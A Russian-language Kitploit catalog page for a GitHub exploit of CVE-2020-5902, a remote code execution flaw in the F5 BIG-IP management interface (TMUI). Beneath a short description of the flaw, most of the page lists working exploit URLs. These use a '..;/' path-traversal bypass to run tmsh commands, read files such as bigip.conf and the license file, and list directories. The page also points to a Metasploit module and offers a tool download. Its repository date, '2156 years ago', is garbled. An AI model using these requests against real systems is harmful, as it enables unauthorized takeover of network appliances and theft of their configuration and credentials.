Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/murataydemir/cve-2020-5902
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP Удаленное выполнение кода (RCE)

Репозиторий
2156 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

[CVE-2020-5902] Удаленное выполнение кода в пользовательском интерфейсе управления трафиком (TMUI) F5 BIG-IP


В версиях BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 и 11.6.1-11.6.5.1 в пользовательском интерфейсе управления трафиком (TMUI), также называемом утилитой конфигурации (Configuration utility), существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах.

Эта уязвимость позволяет неавторизованным злоумышленникам или авторизованным пользователям, имеющим сетевой доступ к утилите конфигурации через управляющий порт BIG-IP и/или self IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы, отключать службы и/или выполнять произвольный Java-код. Данная уязвимость может привести к полной компрометации системы. Система BIG-IP в режиме Appliance также уязвима. Эта проблема не затрагивает плоскость данных (data plane); затронута только плоскость управления (control plane).

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallab/workspace/directoryList.jsp?directoryPath=/usr/local/www/

Официальное уведомление об уязвимости опубликовано F5, и вы можете ознакомиться с ним здесь
Кроме того, для CVE-2020-5902 доступен модуль Metasploit с рейтингом Excellent. Вы можете найти Ruby-код модуля Metasploit для exploits/linux/http/f5_bigip_tmui_rce.rb

Скачать инструмент